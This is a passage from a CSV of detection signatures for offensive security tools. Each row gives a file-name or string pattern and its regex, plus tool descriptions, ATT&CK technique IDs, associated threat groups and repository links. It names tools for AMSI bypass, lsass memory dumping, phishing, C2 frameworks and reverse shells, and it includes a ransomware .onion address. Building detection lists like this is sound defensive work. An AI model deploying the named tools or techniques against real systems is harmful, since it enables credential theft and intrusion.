Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33814" "*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33815" "*AlphabugX/csOnvps*",".{0,1000}AlphabugX\/csOnvps.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33816" 
"*alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad.onion*",".{0,1000}alphvmmm27o3abo3r2mlmjrpdmzle3rykajqc5xsj7j7ejksbpsa36ad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33818" "*Already in high integrity, no need to privesc!*",".{0,1000}Already\sin\shigh\sintegrity,\sno\sneed\sto\sprivesc!.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","33819" "*Already SYSTEM*not elevating*",".{0,1000}Already\sSYSTEM.{0,1000}not\selevating.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#content","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","33820" "*AlteredSecurity/365-Stealer*",".{0,1000}AlteredSecurity\/365\-Stealer.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","1","N/A","N/A","10","5","488","89","2024-06-08T21:03:50Z","2020-09-20T18:22:36Z","33822" "*AlteredSecurity/Disable-TamperProtection*",".{0,1000}AlteredSecurity\/Disable\-TamperProtection.{0,1000}","offensive_tool_keyword","Disable-TamperProtection","disable TamperProtection and other Defender / MDE components","T1562.001 - T1562.007","TA0005","N/A","N/A","Defense Evasion","https://github.com/AlteredSecurity/Disable-TamperProtection","1","1","N/A","N/A","10","3","208","35","2024-06-06T14:44:59Z","2024-06-05T12:48:56Z","33823" "*alwaysinstallelevated.*",".{0,1000}alwaysinstallelevated\..{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. 
Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","33824" "*alwaysinstallelevated.c*",".{0,1000}alwaysinstallelevated\.c.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","33825" "*alwaysinstallelevated.o*",".{0,1000}alwaysinstallelevated\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","N/A","9","5","405","47","2024-06-15T16:54:32Z","2023-03-20T04:19:40Z","33826" "*am0nsec/HellsGate*",".{0,1000}am0nsec\/HellsGate.{0,1000}","offensive_tool_keyword","HellsGate","The Hell's Gate technique is a method employed by malware to hide its malicious behavior and avoid detection. This technique involves executing system calls directly thus bypassing the Windows API (Application Programming Interface) which is typically monitored by EDRs","T1055 - T1548.002 - T1129","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/am0nsec/HellsGate","1","1","N/A","N/A","N/A","10","1028","121","2021-06-28T15:42:36Z","2020-06-02T17:10:21Z","33827" "*amass enum -d *",".{0,1000}amass\senum\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","33830" "*amass-get-rootdomains*",".{0,1000}amass\-get\-rootdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","33831" "*amass-get-subdomains*",".{0,1000}amass\-get\-subdomains.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","33832" 
"*AmberWolfCyber/NachoVPN*",".{0,1000}AmberWolfCyber\/NachoVPN.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","1","N/A","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","33833" "*amibypass.exe*",".{0,1000}amibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33834" "*amjcyber/pwnlook*",".{0,1000}amjcyber\/pwnlook.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","1","N/A","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","33836" "*amkmjjmmflddogmhpjloimipbofnfjih*",".{0,1000}amkmjjmmflddogmhpjloimipbofnfjih.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential 
Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","33837" "*Amnesiac.ps1*",".{0,1000}Amnesiac\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33841" "*Amnesiac_ShellReady.ps1*",".{0,1000}Amnesiac_ShellReady\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33842" "*Amnesiac-main.zip*",".{0,1000}Amnesiac\-main\.zip.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","33843" "*AMS1-Patch.exe*",".{0,1000}AMS1\-Patch\.exe.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33846" "*AMSI patched in all 
powershells*",".{0,1000}AMSI\spatched\sin\sall\spowershells.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","0","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33847" "*AMSI_Bypass.ps1*",".{0,1000}AMSI_Bypass\.ps1.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","33848" "*AMSI_bypass_20*.ps1",".{0,1000}AMSI_bypass_20.{0,1000}\.ps1","offensive_tool_keyword","PSSW100AVB","This is the PSSW100AVB (Powershell Scripts With 100% AV Bypass) Framework.A list of useful Powershell scripts with 100% AV bypass ratio","T1112 - T1562.001 - T1086 - T1548.002 - T1059.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/tihanyin/PSSW100AVB","1","1","N/A","N/A","N/A","10","1104","174","2025-01-28T10:47:44Z","2021-10-08T17:36:24Z","33849" "*AMSI_patch-main*",".{0,1000}AMSI_patch\-main.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33850" "*amsi-bypass*",".{0,1000}amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - 
COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","33851" "*AmsiBypass.cs*",".{0,1000}AmsiBypass\.cs.{0,1000}","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/klezVirus/CheeseTools","1","1","N/A","N/A","10","8","706","143","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z","33852" "*amsibypass.exe*",".{0,1000}amsibypass\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33853" "*Amsi-Killer.exe*",".{0,1000}Amsi\-Killer\.exe.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33854" "*Amsi-Killer.sln*",".{0,1000}Amsi\-Killer\.sln.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33855" "*Amsi-Killer.vcxproj*",".{0,1000}Amsi\-Killer\.vcxproj.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI 
bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33856" "*Amsi-Killer-master*",".{0,1000}Amsi\-Killer\-master.{0,1000}","offensive_tool_keyword","Amsi-Killer","Lifetime AMSI bypass","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZeroMemoryEx/Amsi-Killer","1","1","N/A","N/A","10","7","624","90","2023-09-26T00:49:22Z","2023-02-26T19:05:14Z","33857" "*AmsiOpenSession.cpp*",".{0,1000}AmsiOpenSession\.cpp.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33858" "*AmsiOpenSession.sln*",".{0,1000}AmsiOpenSession\.sln.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33859" "*AmsiOpenSession.vcxproj*",".{0,1000}AmsiOpenSession\.vcxproj.{0,1000}","offensive_tool_keyword","AMSI_patch","Patching AmsiOpenSession by forcing an error branching","T1055 - T1055.001 - T1112","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/AMSI_patch","1","1","N/A","N/A","8","2","145","29","2023-08-02T02:27:00Z","2023-02-03T18:11:37Z","33860" "*AmsiTrigger.exe*",".{0,1000}AmsiTrigger\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. 
On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","33861" "*AMSITrigger.exe*",".{0,1000}AMSITrigger\.exe.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","33862" "*AmsiTrigger_x64.exe*",".{0,1000}AmsiTrigger_x64\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","33863" "*amsitrigger_x64.exe*",".{0,1000}amsitrigger_x64\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","33864" "*AmsiTrigger_x86.exe*",".{0,1000}AmsiTrigger_x86\.exe.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","1","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","33865" "*An interactive shell to spoof some LOLBins*",".{0,1000}An\sinteractive\sshell\sto\sspoof\ssome\sLOLBins.{0,1000}","offensive_tool_keyword","LOLSpoof","An interactive shell to spoof some LOLBins command line","T1036.005","TA0005","N/A","N/A","Defense Evasion","https://github.com/itaymigdal/LOLSpoof","1","0","N/A","N/A","8","2","184","24","2024-01-27T05:43:59Z","2024-01-16T20:15:38Z","33866" "*An0nUD4Y/Evilginx2-Phishlets*",".{0,1000}An0nUD4Y\/Evilginx2\-Phishlets.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","N/A","10","7","670","263","2025-02-06T02:46:16Z","2020-05-13T05:58:43Z","33867" "*and Credential Guard will not be bypassed*",".{0,1000}and\sCredential\sGuard\swill\snot\sbe\sbypassed.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - 
TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","33868" "*andotp2john.py*",".{0,1000}andotp2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33870" "*AndrewSpecial.cpp*",".{0,1000}AndrewSpecial\.cpp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","33871" "*AndrewSpecial.exe*",".{0,1000}AndrewSpecial\.exe.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","33872" "*AndrewSpecial-master*",".{0,1000}AndrewSpecial\-master.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","33873" "*android/meterpreter/reverse_tcp*",".{0,1000}android\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - 
Turla","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","33874" "*androidbackup2john.py*",".{0,1000}androidbackup2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33875" "*androidfde2john.py*",".{0,1000}androidfde2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33876" 